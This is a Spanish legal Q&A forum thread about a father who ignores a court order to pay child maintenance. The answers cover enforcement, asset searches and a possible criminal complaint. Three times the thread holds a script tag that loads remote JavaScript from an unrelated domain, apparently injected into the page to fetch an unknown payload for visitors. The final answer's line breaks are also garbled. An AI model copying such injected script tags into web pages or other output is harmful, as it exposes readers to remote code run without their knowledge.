Manutención ¿Puede dejar de pasarla?

Tengo una sentencia judicial en la que el padre de mi hijo tiene que
pasarme la manutención.Desde hace más de 1 año y medio no llama,no lo ve
y no pasa la manutención.
No está trabajando, aunque creo que
cobra la ayuda de los 400e, recibió una herencia pero en el registro no
aparece nada a su nombre. Me consta que se pulió el dinero pero quedan
propiedades que deben estar a nombre de los padres. ¿No se puede hacer
nada para que cumpla la sentencia?

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.3491193909252833"></script>
Respuesta

Por supuesto que sí: presentar una demanda de ejecución de esa sentencia. Contacte con un abogado para formalizarla, ya sea de pago o solicitando uno del turno de oficio en el Colegio de Abogados.

Verá eso es lo que ha hecho mi abogada de oficio, él no se presentó al juzgado y no aparece nada a su nombre. Así que según mi abogada no se le puede obligar a pagar y ese es mi problema.

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.2730925183446632"></script>

En ese caso y como dice un refrán local, "de donde no hay no se puede sacar". En el trámite de esa ejecución (que no caduca nunca) podrá solicitar de vez en cuando

Una averiguación patrimonial para obrar en consecuencia, pero no mucho más.

Otra opción sería denunciarlo penalmente. Con ello no es que consiga dinero

Necesariamente, sino que puede conseguir una condena por esa desatención. Si él se ve

Encima un problema de esa dimensión, quizás se esfuerce más en conseguir mejorar su

Situación. Sería cuestión de plantearlo a su abogado para que lo valore.

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.6682348110993126"></script>